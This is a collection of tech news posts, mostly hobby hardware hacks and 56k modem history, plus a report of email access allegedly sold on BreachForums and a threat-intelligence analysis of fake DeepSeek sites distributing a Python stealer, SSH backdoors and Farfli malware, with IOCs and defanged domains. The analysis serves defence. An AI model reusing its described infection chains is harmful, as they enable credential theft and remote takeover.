The Strange Afterlife of the Xbox Kinect
The tale of the Microsoft Xbox Kinect is one of those sad situations where a great product was used in an application that turned out to be a bit of a flop and was discontinued because of it, despite its usefulness in other areas. This article from the Guardian is a quick read on how this handy depth camera has found other uses in somewhat niche areas, with not a computer game in sight.
It’s rather obvious that a camera that can generate a 3D depth map, in parallel with a 2D reference image, could have many applications beyond gaming, especially in the hands of us hackers. Potential uses include autonomous roving robots, 3D scanning, and complex user interfaces—there are endless possibilities. Artists producing interactive art exhibits would sit firmly in that last category, with the Kinect used in countless installations worldwide.
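As a rough illustration of why a depth map is so handy for robots and 3D scanning, here's a minimal sketch of back-projecting Kinect-style depth pixels into a 3D point cloud using the pinhole camera model. The intrinsics below are ballpark figures for a Kinect v1 depth camera, not calibrated values, so treat them as placeholders:

```python
# Approximate Kinect v1 depth-camera intrinsics; real values vary per
# unit, so replace these with your own calibration results.
FX, FY = 594.0, 591.0   # focal lengths in pixels (assumed)
CX, CY = 320.0, 240.0   # optical center for a 640x480 depth image

def depth_to_point(u, v, depth_m):
    """Back-project one depth pixel (u, v) with depth in metres to an
    (x, y, z) point in the camera frame using the pinhole model."""
    x = (u - CX) * depth_m / FX
    y = (v - CY) * depth_m / FY
    return (x, y, depth_m)

def depth_map_to_cloud(depth_map):
    """Convert a row-major grid of depth readings (metres) to a point
    list, skipping invalid zero readings as the Kinect reports them."""
    cloud = []
    for v, row in enumerate(depth_map):
        for u, d in enumerate(row):
            if d > 0:
                cloud.append(depth_to_point(u, v, d))
    return cloud
```

A pixel at the optical center maps straight down the z-axis, which makes for an easy sanity check before feeding real frames in.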
Apparently, the Kinect also has quite the following in ghost-hunting circles which, as many a dubious TV show demonstrates, do their filming almost entirely under IR light. The Kinect’s IR-based structured-light system is well-suited to these conditions, and since its processing core runs a machine-learning model trained specifically to track human figures, it’s no surprise that the device can pick up those invisible, pesky spirits hiding in the noise. Anyway, all of these applications depend on the used-market supply of Kinect devices, now over a decade old, found online and at car boot sales. That means one day the Kinect really will die off, only to be replaced by specialist devices that cost orders of magnitude more to acquire.
In the unlikely event you’ve not encountered non-gaming applications for the Kinect, here’s an old project to scan an entire room to get you started. Just to be perverse, here’s a gaming application that Microsoft didn’t think of, and to round out, the bad news that Microsoft really has abandoned the product.
Plastic Gear Repair
We’ve seen several methods of repairing plastic gears. After all, a gear is usually the same all the way around, so it is very tempting to duplicate a good part to replace a damaged part. That’s exactly what [repairman 101] does in the video below. He uses hot glue to form a temporary mold and casts a resin replacement in place with a part of a common staple as a metal reinforcement.
The process starts with using a hobby tool to remove even more of the damaged gear, making a V-shaped slot to accept the repair. The next step is to create a mold. To do that, he takes a piece of plastic and uses hot glue to secure it near a good part of the gear. Then, he fills the area with more hot glue and carefully removes it.
He uses WD-40 as a mold release. He moves the mold to the damaged area and cuts a bit of wire to serve as a support, using a soldering iron to melt it into the gear’s body. Some resin fills the mold, and once it is cured, the gear requires a little rework, but then it seems to work fine.
We would be tempted to use some 3D printing resin with UV curing, since we have it on hand. Then again, you could easily scan the gear, repair it digitally on the computer and just print a new one. That would work, too.
We’ve seen the same process using candle wax and epoxy. If you want to see an example of just printing an entire replacement, we’ve seen that, too.
youtube.com/embed/iNdAn-Fnc_Y?…
Custom Touchpad PCBs Without The Pain
Many of us use touchpads daily on our laptops, but rarely do we give much thought to what they really do. In fact, they are a PCB matrix of conductive pads, with a controller chip addressing it and sensing the area of contact. Such a complex and repetitive pattern can be annoying to create by hand in an EDA package, so [Timonsku] has written a script to take away the work.
It starts with an OpenSCAD script (originally written by Texas Instruments, and released as open source) that creates a diamond grid, which can be edited to the required dimensions and resolution. This is then exported as a DXF file, and the magic begins in a Python script. After adjustment of variables to suit, it finishes with an Eagle-compatible board file which should be importable into other EDA packages.
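To give a flavor of what such a script automates, here's a hypothetical pure-Python sketch that lays out a diamond-pad matrix as coordinate lists. The real toolchain works differently (OpenSCAD to DXF to an Eagle board file), and the exact interleaving of X and Y diamonds here is a simplification, so take it as an illustration of the repetitive geometry rather than the actual pattern:

```python
def diamond(cx, cy, half):
    """Vertices of one diamond pad (a square rotated 45 degrees),
    centred at (cx, cy) with the given half-diagonal, in millimetres."""
    return [(cx, cy + half), (cx + half, cy), (cx, cy - half), (cx - half, cy)]

def diamond_grid(cols, rows, pitch, gap=0.2):
    """Lay out an interleaved X/Y diamond matrix of the kind used by
    capacitive touchpads: X-axis diamonds on the grid nodes, Y-axis
    diamonds on the half-pitch offsets between them. Returns a list of
    (net_name, vertex_list) tuples."""
    half = pitch / 2 - gap
    pads = []
    for r in range(rows):
        for c in range(cols):
            pads.append(("X%d" % c, diamond(c * pitch, r * pitch, half)))
            # Y-axis diamonds sit between the X pads, offset by half a pitch.
            pads.append(("Y%d" % r, diamond(c * pitch + pitch / 2,
                                            r * pitch + pitch / 2, half)))
    return pads
```

Even this toy version makes the point: hand-placing hundreds of near-identical polygons is exactly the kind of job a script should own.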
We’ve never made a touchpad ourselves, but having done other such repetitive PCB tasks we feel the pain of anyone who has. Looking at this project we’re struck by the thought that its approach could be adapted for other uses, so it’s one to file away for later.
This isn’t the first home-made touchpad project we’ve brought you.
Hackaday Europe 2025 Welcomes David Cuartielles, Announces Friday Night Bring-a-Hack
If you’re coming to Hackaday Europe 2025, you’ve got just over a week to get your bags packed and head on out to Berlin. Of course you have tickets already, right? And if you were still on the fence, let us tempt you with our keynote talk and some news about the Friday night meetup, sponsored by Crowd Supply.
But first, the keynote! You might know David Cuartielles as one of the four founders of Arduino. As a telecommunications engineer and doctor in design, he has devoted the last 25 years to experimenting with different educational models centered on the creation of interactive artifacts and platforms.
His talk, “What if the future (of electronics) was compostable?”, asks whether we can make our physical projects more ecologically friendly, and looks at Arduino’s approach to biodegradable electronics and AI-enabled industrial technologies.
Bring a Hack
Come join us for informal Bring-a-Hack drinks starting at 18:00 on Friday night, March 14th, at the Jockel Biergarten, Ratiborstraße 14C. It’s a great chance to hang out while there are no presentations you’d feel bad about missing. If you’ve got a project that fits in your backpack, bring it along and show us all. And if you just feel like relaxing over a beverage and some Biergarten fare, that’s great too! We’ll see you there.
Hacking Digital Calipers for Automated Measurements and Sorta-Micron Accuracy
We’ll take a guess that most readers have a set of digital calipers somewhere close to hand right now. The cheapest ones tend to be a little unsatisfying in the hand, a bit crusty and crunchy to use. But as [Matthias Wandel] shows us, these budget tools are quite hackable and a lot more precise than they appear to be.
[Matthias] is perhaps best known around these parts for making machine tools using mainly wood. It’s an unconventional material for things like the CNC router he loves to hate, but he makes it work through a combination of clever engineering and a willingness to work within the limits of the machine. To assess those limits, he connected some cheap digital calipers to a Raspberry Pi by hacking the serial interface that seems to be built into all of these tools. His particular calipers output a pair of 24-bit words over a synchronous serial connection a couple of times per second, but at a level too low to be read by the Pi. He solved this with a clever resistor ladder to shift the signals to straddle the 1.8 volt transition on the Pi, and after solving some noise problems with a few strategically placed capacitors and some software debouncing, he was gathering data on his Pi.
Although his setup was fine for the measurements he needed to make, [Matthias] couldn’t help falling down the rabbit hole of trying to milk better resolution from the calipers. On paper, the 24-bit output should provide micron-ish resolution, but sadly, the readings seem to fluctuate rapidly between two levels, making it difficult to obtain an average quickly enough to be useful. Still, it’s a good exercise, and overall, these hacks should prove handy for anyone who wants to dip a toe into automated metrology on a budget.
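For anyone wanting to replicate the data-gathering side, decoding the caliper's serial output might look something like the sketch below. The 24-bit word assembly is generic, but the field split (a 20-bit position in hundredths of a millimetre plus a sign bit) is an assumption that varies between caliper models, so verify it against your own unit before trusting the numbers:

```python
def decode_frame(bits):
    """Assemble a 24-bit word from data bits clocked in LSB-first, then
    split it the way many cheap calipers do: low 20 bits of position in
    hundredths of a millimetre plus an assumed sign flag at bit 20.
    The exact field layout differs between models -- treat this as a
    starting point, not a spec."""
    word = 0
    for i, b in enumerate(bits[:24]):
        word |= (b & 1) << i
    value = (word & 0xFFFFF) / 100.0   # hundredths of a millimetre
    if word & (1 << 20):               # assumed sign bit
        value = -value
    return value
```

In practice the bits would come from sampling the caliper's data line on clock edges (after the level shifting and debouncing [Matthias] describes); here they are just a list of 0s and 1s.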
youtube.com/embed/0PA-KvnAwJM?…
Thanks to [Dragan] for the tip.
Why 56k Modems Relied On Digital Phone Lines You Didn’t Know We Had
If you came of age in the 1990s, you’ll remember the unmistakable auditory handshake of an analog modem negotiating its connection via the plain old telephone system. That cacophony of screeches and hisses was the result of careful engineering. They allowed digital data to travel down phone lines that were only ever built to carry audio—and pretty crummy audio, at that.
Speeds crept up over the years, eventually reaching 33.6 kbps—thought to be the practical limit for audio modems running over the telephone network. Yet, hindsight tells us that 56k modems eventually became the norm! It was all thanks to some lateral thinking which made the most of what the 1990s phone network had to offer.
Breaking the Sound Barrier
The V.34 standard enabled transmission at up to 33.6 kbps, though many modems topped out at the lower level of 28.8 kbps in the mid-1990s. Credit: Raimond Spekking, CC BY-SA 4.0
When traditional dial-up modems communicate, they encode digital bits as screechy analog tones that would then be carried over phone lines originally designed for human voices. It’s an imperfect way of doing things, but it was the most practical way of networking computers in the olden days. There was already a telephone line in just about every house and business, so it made sense to use them as a conduit to get computers online.
For years, speeds ticked up as modem manufacturers ratified new, faster modulation schemes. Speeds eventually reached 33.6 kbps which was believed to be near the theoretical maximum speed possible over standard telephone lines. This largely came down to the Shannon limit of typical phone lines—basically, with the amount of noise on a given line, and viable error correcting methods, there was a maximum speed at which data could reliably be transferred.
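That limit is easy to sanity-check with the Shannon-Hartley theorem. The bandwidth and SNR figures below are illustrative assumptions for a decent analog phone channel, not measurements of any particular line:

```python
import math

def shannon_capacity_bps(bandwidth_hz, snr_db):
    """Shannon-Hartley limit: C = B * log2(1 + S/N)."""
    snr_linear = 10 ** (snr_db / 10)
    return bandwidth_hz * math.log2(1 + snr_linear)

# ~3.1 kHz of usable bandwidth and ~35 dB SNR are rough guesses for a
# good analog line; the result lands near the familiar 33.6 kbps ceiling.
limit = shannon_capacity_bps(3100, 35)
```

With those assumed numbers the capacity comes out around 36 kbps, which is why 33.6 kbps was seen as close to the practical ceiling for a purely analog path.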
In the late 1990s, though, everything changed. 56 kbps modems started flooding the market as rival manufacturers vied to have the fastest, most capable product on offer. The speed limits had been smashed. The answer lay not in breaking Shannon’s Law, but in exploiting a fundamental change that had quietly transformed the telephone network without the public ever noticing.
Multiplexing Madness
Linecards in phone exchanges were responsible for turning analog signals into digital signals for further transmission through the phone network. Credit: Pdesousa359, CC BY-SA 3.0
In the late 1990s, most home users still connected to the telephone network through analog phone lines that used simple copper wires running to their houses, serving as the critical “last mile” connection. However, by this time, the rest of the telephone network had undergone a massive digital transformation. Telephone companies had replaced most of their long-distance trunks and switching equipment with digital technology. Once a home user’s phone line hit a central office, it was usually immediately turned into a digital signal for easier handling and long-distance transmission. Using the Digital Signal 0 (DS0) encoding, phone calls became digital with an 8 kHz sample rate using 8-bit pulse code modulation, working out to a maximum data rate of 64 kbps per phone line.
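The non-linear part of DS0 is G.711 companding. Here's a sketch of the continuous µ-law curve (the standard actually quantizes a piecewise-linear approximation of it), which shows why small signal levels get disproportionate resolution, great for voice but hostile to a naive modem waveform:

```python
import math

MU = 255            # mu-law parameter used on North American DS0 channels
DS0_BPS = 8000 * 8  # 8 kHz sampling x 8-bit samples = 64 kbps per channel

def mu_law_compress(x):
    """Continuous mu-law companding curve. Input x is a normalized
    sample in [-1, 1]; output is the companded value in [-1, 1].
    Quiet signals are boosted, loud ones compressed."""
    sign = 1 if x >= 0 else -1
    return sign * math.log(1 + MU * abs(x)) / math.log(1 + MU)
```

A sample at 1% of full scale comes out above 20% after companding, which is exactly the distortion a modem waveform designed for a linear channel never expected.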
Traditionally, your ISP would communicate over the phone network much like you. Their modems would turn digital signals into analog audio, and pipe them into a regular phone line. That analog audio would then get converted to a DS0 digital signal again as it moved around the back-end of the phone network, and then back to analog for the last mile to the customer. Finally, the customer’s modem would take the analog signal and turn it back into digital data for the attached computer.
This fell apart at higher speeds. Modem manufacturers couldn’t find a way to modulate digital data into audio at 56 kbps in a way that would survive the DS0 encoding. It had largely been designed to transmit human voices successfully, and relied on non-linear encoding schemes that weren’t friendly to digital signals.
The breakthrough came when modem manufacturers realized that ISPs could operate differently from end users. By virtue of their position, they could work with telephone companies to access the phone network digitally. Thus, the ISP would simply pipe digital data directly into the phone network, rather than modulating it into audio first. The signal remained digital all the way until it reached the local exchange, where it would be converted into audio and sent down the phone line into the customer’s home. This eliminated a whole set of digital-to-analog and analog-to-digital conversions which were capping speeds, and let ISPs shoot data straight at customers at up to 56 kbps.

The basic concept behind 56 kbps operation: so-called “digital modems” on the ISP side would squirt digital signals directly into the digital part of the phone network. These would then be modulated to analog just once, at the exchange level, to travel the last mile over the customer’s copper phone line. Credit: ITU, V.90 standard
This technique only worked in one direction, however. End users still had to use regular modems, whose analog audio output would be converted through DS0 at some point on its way back to the ISP. This kept upload speeds limited to 33.6 kbps.

USRobotics was one of the innovators in the 56k modem space. Note the x2 branding on this SPORTSTER modem, denoting the company’s proprietary modulation method. Credit: Xiaowei, CC BY 3.0
The race to exploit this insight led to a minor format war. US Robotics developed its x2 standard, so named for being double the speed of 28.8k modems. Rival manufacturer Rockwell soon countered with the K56Flex standard, which leveraged the same trick to boost speeds. ISPs quickly began upgrading to work with the faster modems, but consumers were confused by the competing standards.
The standoff ended in 1998 when the International Telecommunication Union (ITU) stepped in to create the V.90 standard. It was incompatible with both x2 and K56Flex, but soon became the industry norm. This standardization finally allowed interoperable 56k communications across vendors and ISPs. It was supplanted by the updated V.92 standard in 2000, which increased upload speeds to 48 kbps with some special upstream encoding tricks, while also adding new call-waiting and quick-connect features.
Final Hurrah
Despite the theoretical 56 kbps limit, actual connection speeds rarely reached such heights. Line quality and a user’s distance from the central office could degrade performance, and power limits mandated by government regulations made 53 kbps a more realistic peak speed in practice. The connection negotiation process users experienced – that distinctive modem “handshake” – often involved the modems testing line conditions and stepping down to the highest reliable speed. Despite the limitations, 56k modems soon became the norm as customers hoped to achieve a healthy speed boost over the older 33.6k and 28k modems of years past.
The 56K modem represents an elegant solution for a brief period in telecommunications history, when analog modems still ruled and broadband was still obscure and expensive. It was a technology born when modem manufacturers realized the phone network they were now working with was not the one they started with so many decades before. The average consumer may never have appreciated the nifty tricks that made the 56k modem work, but it was a smart piece of engineering that made the Internet ever so slightly more usable in those final years before DSL and cable began to dominate all.
Italian Ministry of the Interior under attack? Email access for sale on underground forums!
In recent days, a user of the underground forum “BreachForums” posted a listing advertising the alleged sale of access to email accounts belonging to the Italian Ministry of the Interior (the “@interno.it” domain).
The news, so far unconfirmed by institutional sources, is particularly worrying because, if founded, it could have serious national-security implications.
Details of the Possible Breach
- Origin of the post: The listing appears on a popular underground forum where data stolen from government bodies and major companies frequently circulates. The author goes by the nickname “DataSec” and has a fair amount of “reputation” on the platform.
- Publication date: The post was published on March 3, 2025 and, according to the forum’s metadata, was edited once on the morning of March 4.
- Items for sale: “DataSec” claims to hold credentials and internal access to several mailboxes tied to the Italian Ministry of the Interior (“@interno.it” domain). They are offered for payment in cryptocurrency, a recurring payment method in the cybercrime scene.
Credibility of the Source
BreachForums is known for hosting listings of stolen data, often genuine, but there is no shortage of “fake listings” designed to defraud would-be buyers. At present there is no tangible evidence (such as data dumps or screenshots proving the compromise) to confirm that these credentials really exist.
Red Hot Cyber (RHC) will continue to monitor the situation, paying particular attention to any developments in the BreachForums thread or to further evidence surfacing in other underground venues and sector-specific Telegram channels.
- Future coverage: If the Ministry of the Interior or other institutions release official statements, RHC will report them promptly, dedicating a specific article to the statements and emerging evidence.
- Anonymous tips: Anyone aware of additional details, or able to provide useful corroboration, can contact us via our encrypted email address; the utmost confidentiality is guaranteed.
Conclusions
The alleged sale of email access linked to the Italian Ministry of the Interior is a potential alarm bell for institutional security. Although the available information does not yet confirm an actual compromise, it is essential to maintain a high level of vigilance and, if necessary, carry out thorough technical and legal checks.
Prudence and transparency are essential in circumstances where even the suspicion of a breach can undermine citizens’ trust and the credibility of the institutions involved. RHC remains available to host any official communications and to provide updates should significant developments emerge.
This article was produced using the Recorded Future platform, a strategic partner of Red Hot Cyber and a leader in cyber threat intelligence, providing advanced analysis to identify and counter malicious activity in cyberspace.
The article “Italian Ministry of the Interior under attack? Email access for sale on underground forums!” originally appeared on il blog della sicurezza informatica.
The Future We Never Got, Running a Future We Got
If you’re familiar with Java here in 2025, the programming language you know is a world away from what Sun Microsystems planned for it in the mid-1990s. Back then it was key to a bright coffee-themed future of write-once-run-anywhere software, and aside from your web browser using it to run applications, your computer would be a diskless workstation running Java bytecode natively on the silicon.
What we got was slow and disappointing Java applets in web pages, and a line of cut-down SPARC-based JavaStations which did nothing to change the world. [FatSquirrel] has one of these machines, and a quarter century later, has it running NetBSD. It’s an interesting journey both into 1990s tech, and some modern-day networking tricks to make it happen.
These machines suffer, as might be expected, from exhausted memory backup batteries. Fortunately, once the serial port has been figured out, they drop you into an OpenBoot prompt which, in common with Apple machines of the ’90s, gives you a Forth interpreter. There’s enough info online to load the NVRAM with a config, and the machine stuttered into life. To do anything useful takes a network with RARP and NFS to serve an IP address and disk image respectively, which a modern Linux machine is quite happy to do. The resulting NetBSD machine maybe isn’t as useful as it could be, but at risk of angering any Java enthusiasts, perhaps it’s more useful than the original JavaOS.
We remember the promise of a Java-based future too, and tasted the bitter disappointment of stuttering Java applets in our web pages. However, given that so much of what we use now quietly runs Java in the background without our noticing it, perhaps the shade of Sun Microsystems had the last laugh after all. This isn’t the first ’90s machine that’s been taught new tricks here, some of them have received Java for the first time.
Trojans disguised as AI: Cybercriminals exploit DeepSeek’s popularity
Introduction
Among the most significant events in the AI world in early 2025 was the release of DeepSeek-R1 – a powerful reasoning large language model (LLM) with open weights. It’s available both for local use and as a free service. Since DeepSeek was the first service to offer access to a reasoning LLM to a wide audience, it quickly gained popularity, mirroring the success of ChatGPT. Naturally, this surge in interest also attracted cybercriminals.
While analyzing our internal threat intelligence data, we discovered several groups of websites mimicking the official DeepSeek chatbot site and distributing malicious code disguised as a client for the popular service.
Screenshot of the official DeepSeek website (February 2025)
Scheme 1: Python stealer and non-existent DeepSeek client
The first group of websites was hosted on domains whose names included DeepSeek model versions (V3 and R1):
- r1-deepseek[.]net;
- v3-deepseek[.]com.
As shown in the screenshot, the fake website lacks the option to start a chat – you can only download an application. However, the real DeepSeek doesn’t have an official Windows client.
Screenshot of the fake website
Clicking the “Get DeepSeek App” button downloads a small archive, deep-seek-installation.zip. The archive contains the DeepSeek Installation.lnk file, which holds a URL.
At the time of publishing this research, the attackers had modified the fake page hosted on the v3-deepseek[.]com domain. It now prompts users to download a client for the Grok model developed by xAI. We’re observing similar activity on the v3-grok[.]com domain as well. Disguised as a client is an archive named grok-ai-installation.zip, containing the same shortcut.
Executing the .lnk file runs a script located at the URL inside the shortcut:
This script downloads and unpacks an archive named f.zip.
Contents of the unpacked archive
Next, the script runs the 1.bat file from the unpacked archive.
Contents of the BAT file
The downloaded archive also contains the svchost.exe and python.py files. The first is a legitimate python.exe binary, renamed to mimic a Windows process and mislead users checking running applications in Task Manager. It is used to launch python.py, which contains the malicious payload (we’ve also seen this file named code.py). This is a stealer script written in Python that we haven’t seen in attacks before. If it’s executed successfully, the attackers obtain a wealth of data from the victim’s computer: cookies and session tokens from various browsers, login credentials for email, gaming, and other accounts, files with certain extensions, cryptocurrency wallet information, and more.
After collecting the necessary data, the script generates an archive and then either sends it to the stealer’s operators using a Telegram bot or uploads it to the Gofile file-sharing service. Thus, attempting to use the chatbot could result in the victim losing social media access, personal data, and even cryptocurrency. If corporate credentials are stored on the compromised device, entire organizations could also be at risk, leading to far more severe consequences.
Scheme 2: Malicious script and a million views
In another case, fake DeepSeek websites were found on the following domains:
- deepseek-pc-ai[.]com
- deepseek-ai-soft[.]com
We discovered the first domain back in early February, hosting the default Apache web server page with no content. Later, this domain displayed a new web page closely resembling the DeepSeek website. Notably, the fake site uses geofencing: when requests come from certain IP addresses, such as Russian ones, it returns a placeholder page filled with generic SEO text about DeepSeek (we believe this text may have been LLM-generated):
If the IP address and other request parameters meet the specified criteria, the server returns a page resembling DeepSeek. Users are prompted to download a client or start the chatbot, but either action results in downloading a malicious installer created using Inno Setup. Kaspersky products detect it as Trojan-Downloader.Win32.TookPS.*.
When executed, this installer contacts malicious URLs to receive a command that will be executed using cmd. The most common command launches powershell.exe with a Base64-encoded script as an argument. This script accesses an encoded URL to download another PowerShell script, which activates the built-in SSH service and modifies its configuration using the attacker’s keys, allowing remote access to the victim’s computer.
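On the defensive side, the first triage step for such a command line is easy to reproduce: PowerShell's -EncodedCommand argument is Base64 over UTF-16LE text. The sample string below is a harmless stand-in, not the actual malicious payload:

```python
import base64

def decode_powershell_encoded(arg):
    """Decode a PowerShell -EncodedCommand argument: Base64 wrapping
    UTF-16LE text. Handy first step when triaging a suspicious command
    line pulled from process logs."""
    return base64.b64decode(arg).decode("utf-16-le")

# Harmless stand-in for a real encoded payload:
sample = base64.b64encode("Write-Host hello".encode("utf-16-le")).decode()
```

Running the decoder on a captured argument reveals the script text without ever executing it.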
Part of the malicious PowerShell script
This case is notable because we managed to identify the primary vector for spreading the malicious links – posts on the social network X (formerly Twitter):
This post, directing users to deepseek-pc-ai[.]com, was made from an account belonging to an Australian company. The post gained 1.2 million views and over a hundred reposts, most of which were probably made by bots – note the similar usernames and identifiers in their bios:
Some users in the comments dutifully point out the malicious nature of the link.
Links to deepseek-ai-soft[.]com were also distributed through X posts, but at the time of investigation, they were only available in Google’s cache:
Scheme 3: Backdoors and attacks on Chinese users
We also encountered sites that directly distributed malicious executable files. One such file was associated with the following domains:
- app.delpaseek[.]com;
- app.deapseek[.]com;
- dpsk.dghjwd[.]cn.
These attacks target more technically advanced users – the downloaded malicious payload mimics Ollama, a framework for running LLMs such as DeepSeek on local hardware. This tactic reduces suspicion among potential victims. Kaspersky solutions detect this payload as Backdoor.Win32.Xkcp.a.
The victim only needed to launch the “DeepSeek client” on their device to trigger the malware, which creates a KCP tunnel with predefined parameters.
Additionally, we observed attacks where a victim’s device downloaded the deep_windows_Setup.zip archive, containing a malicious executable. The archive was downloaded from the following domains:
- deep-seek[.]bar;
- deep-seek[.]rest.
The malware in the archive is detected by Kaspersky solutions as Trojan.Win32.Agent.xbwfho. This is an installer created with Inno Setup that uses DLL sideloading to load a malicious library. The DLL in turn extracts and loads into memory a payload hidden using steganography — a Farfli backdoor modification — and injects it into a process.
Both of these campaigns, judging by the language of the bait pages, are targeting Chinese-speaking users.
Conclusion
The nature of the fake websites described in this article suggests these campaigns are widespread and not aimed at specific users.
Cybercriminals use various schemes to lure victims to malicious resources. Typically, links to such sites are distributed through messengers and social networks, as seen in the example with the X post. Attackers may also use typosquatting or purchase ad traffic to malicious sites through numerous affiliate programs.
We strongly advise users to carefully check the addresses of websites they visit, especially if links come from unverified sources. This is especially important for highly popular services. In this case, it’s particularly noteworthy that DeepSeek doesn’t have a native Windows client. This isn’t the first time that cybercriminals have exploited the popularity of chatbots to distribute malware: they’ve previously targeted regular users with Trojans disguised as ChatGPT clients and developers with malicious packages in PyPI. Simple digital hygiene practices, combined with a cutting-edge security solution, can significantly reduce the risk of device infection and personal data loss.
Indicators of compromise
MD5
4ef18b2748a8f499ed99e986b4087518
155bdb53d0bf520e3ae9b47f35212f16
6d097e9ef389bbe62365a3ce3cbaf62d
3e5c2097ffb0cb3a6901e731cdf7223b
e1ea1b600f218c265d09e7240b7ea819
7cb0ca44516968735e40f4fac8c615ce
7088986a8d8fa3ed3d3ddb1f5759ec5d
Malicious domains
r1-deepseek[.]net
v3-deepseek[.]com
deepseek-pc-ai[.]com
deepseek-ai-soft[.]com
app.delpaseek[.]com
app.deapseek[.]com
dpsk.dghjwd[.]cn
deep-seek[.]bar
deep-seek[.]rest
v3-grok[.]com
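A quick way to put the indicators above to work is to hash suspect files and check membership in the MD5 set; a minimal sketch:

```python
import hashlib

# MD5 indicators from the report above
IOC_MD5 = {
    "4ef18b2748a8f499ed99e986b4087518",
    "155bdb53d0bf520e3ae9b47f35212f16",
    "6d097e9ef389bbe62365a3ce3cbaf62d",
    "3e5c2097ffb0cb3a6901e731cdf7223b",
    "e1ea1b600f218c265d09e7240b7ea819",
    "7cb0ca44516968735e40f4fac8c615ce",
    "7088986a8d8fa3ed3d3ddb1f5759ec5d",
}

def md5_matches_ioc(data, iocs=IOC_MD5):
    """Return True if the MD5 of the given file bytes is a known
    indicator of compromise from this campaign."""
    return hashlib.md5(data).hexdigest() in iocs
```

In practice you would feed it the contents of downloaded installers or archives; a match warrants isolating the machine and a deeper look.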
Rackmount all the Things, Hi-Fi Edition
For those who love systems and structure, owning a 19-inch rack with just one slot filled is just not it. But what if the rest of your gear isn’t 19-inch? Well, then you go out and make it so, just like [Cal Bryant] did recently.
The goal was to consolidate multiple devices — DAC, input selector, streamer, and power routing — into a single 2U rackmount unit. His first attempts involved drilling 1U panels to attach gear with removable faceplates. That worked, but not all devices played nice. So his next step became a fully custom enclosure with CAD-modeled brackets and front panels.
OpenSCAD turned out to be a lifesaver, letting [Cal] design modular mounting solutions. Exporting proper circles for CNC turret punching, however, turned out to be a nightmare, so it was FreeCAD to the rescue for post-processing. After some sanding and auto-shop painting, the final faceplate looked factory-made.
Custom switch boxes for power and audio routing keep things tidy, housing everything from USB to XLR inputs. A 4-pole switch even allows seamless swapping between his DAC and DJ controller, while UV-printed graphics bring the finishing touch to this project. For those looking to clean up their Hi-Fi setup (or just love modding for the sake of it), there’s a lot to learn from this build.
If buying a rack is not within your budget, you could start with the well-known IKEA LACK furniture.
A TV With Contrast You Haven’t Seen For Years
If you own a CRT TV to go with your retrocomputers, using it to view a film or a TV show can be something of a surprise. The resolution may be old-fashioned, but the colors jump out at you in a way you’d forgotten CRTs could manage. You’re seeing black levels that LCD screens can’t match, and which you’ll only find comparable on a modern OLED TV. Can an LCD screen achieve decent black levels? [DIY Perks] is here with a modified screen that does just that.
LCD screens work by placing a set of electronic polarizing filters in front of a bright light. Bright pixels let through the light, while black pixels, well, they do their best, but a bit of light gets through. As a result, they have washed-out blacks, and their images aren’t as crisp and high contrast as they should be. More modern LCDs use an array of LEDs as the backlight which they illuminate as a low resolution version of the image, an approach which improves matters but leaves a “halo” round bright spots.
The TV in the video below the break is an older LCD set, from which he removes the backlight and places the electronics in a stand. He can show an image on it by placing a lamp behind it, but he does something much cleverer. An old DLP projector with its color wheel removed projects a high-res luminance map onto the back of the screen, resulting in the coveted high-contrast image. The final result uses a somewhat unwieldy mirror arrangement to shorten the throw distance for the projector, but we love this hack. It’s not the first backlight hack we’ve seen, but perhaps it gives the best result.
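The reason dual modulation works so well: the projected luminance map multiplies the LCD's own transmission, so the two contrast ratios multiply. The figures below are illustrative assumptions, not measurements of this build:

```python
def combined_contrast(panel_ratio, backlight_ratio):
    """In a dual-modulation display the final luminance is the product
    of the two layers' transmissions, so contrast ratios multiply."""
    return panel_ratio * backlight_ratio

# Illustrative numbers only: a 1000:1 LCD panel in front of a 1000:1
# projected luminance map gives a theoretical 1,000,000:1 ratio,
# before optical losses and stray light eat into it.
```

This is the same principle behind commercial dual-layer and local-dimming displays, just taken to a per-pixel extreme with the DLP projector.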
youtube.com/embed/qXrn4MqY1Wo?…
Thanks [Keith Olson] for the tip!
Ptychography for High Resolution Microscopy
Nowadays, if you have a microscope, you probably have a camera of some sort attached. [Applied Science] shows how you can add an array of tiny LEDs and some compute power to produce high-resolution images — higher than you can get with the microscope on its own. The idea is to illuminate each LED in the array individually and take a picture. Then, an algorithm constructs a higher-resolution image from the collected images. You can see the results and an explanation in the video below.
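For the curious, here is a toy sketch of the forward model behind the LED-array technique (Fourier ptychography): tilting the illumination by lighting one LED at a time shifts which patch of the sample’s spectrum makes it through the objective’s aperture, so each LED yields a differently filtered low-resolution image of the same sample. The iterative phase-retrieval reconstruction itself is omitted, and all sizes below are arbitrary, not taken from [Applied Science]’s code.

```python
import numpy as np

def capture(obj, led_shift, aperture):
    """Simulate one low-resolution capture in a Fourier ptychography setup.

    An off-axis LED tilts the illumination, which shifts the sample's
    spectrum relative to the objective's fixed aperture. Many such
    captures together cover a synthetic aperture far wider than the
    objective passes on its own.
    """
    spectrum = np.fft.fftshift(np.fft.fft2(obj))
    shifted = np.roll(spectrum, led_shift, axis=(0, 1))  # illumination tilt
    low_res = np.fft.ifft2(np.fft.ifftshift(shifted * aperture))
    return np.abs(low_res) ** 2  # the camera records intensity only

n = 64
obj = np.random.default_rng(0).random((n, n))  # stand-in for the sample
yy, xx = np.mgrid[-n // 2:n // 2, -n // 2:n // 2]
aperture = (xx ** 2 + yy ** 2 < 10 ** 2).astype(float)  # objective NA cutoff

# Each LED contributes a different spatial-frequency patch of the sample.
img_center = capture(obj, (0, 0), aperture)
img_oblique = capture(obj, (12, 0), aperture)
print(img_center.shape)  # prints (64, 64)
```

This also hints at why the hardware requirements are strict: the reconstruction relies on the captures being consistent with this model, so aberrations or an uncalibrated LED position degrade the result.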
You’d think you could use this to enhance a cheap microscope, but the truth is you need a high-quality microscope to start with. In addition, color cameras may not be usable, so you may have to find or create a monochrome camera.
The code for the project is on GitHub. The LEDs need to be close to a point source, so smaller is better, and that determines what kind of LEDs are usable. Of course, the LEDs go through the sample, so this is suitable for transmissive microscopes, not metallurgical ones, at least in the current incarnation.
You can pull the same stunt with electrons. Or blood.
youtube.com/embed/9KJLWwbs_cQ?…
Designing a Toy Conveyor Belt For Fun and Profit
[Hope This Works] wants to someday build a tiny factory line in the garage, with the intent of producing some simple widget down the line. But what is a tiny factory without tiny conveyor belts? Not a very productive one, that’s for sure.
As you may have noticed, this is designed after the transporter belts from the game Factorio. [Hope This Works] ultimately wants something functional that’s small enough to fit in one hand and has that transporter belt aesthetic going. He also saw this as a way to level up his CAD skills from approximately 1, and as you’ll see in the comprehensive video after the break, that definitely happened.
